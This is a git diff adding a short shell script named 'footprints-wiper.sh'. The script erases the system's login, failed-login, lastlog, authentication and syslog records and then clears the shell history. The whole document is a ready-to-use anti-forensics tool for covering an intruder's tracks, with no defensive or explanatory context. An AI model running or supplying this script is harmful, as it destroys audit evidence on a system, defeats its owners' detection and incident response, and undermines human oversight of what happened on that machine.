diff --git a/shell/footprints-wiper.sh b/shell/footprints-wiper.sh new file mode 100644 index 0000000..5682872 --- /dev/null +++ b/shell/footprints-wiper.sh @@ -0,0 +1,7 @@ +echo > /var/log/wtmp +echo > /var/log/btmp +echo > /var/lastlog +echo > /var/log/auth.log +echo > /var/log/syslog + +history -c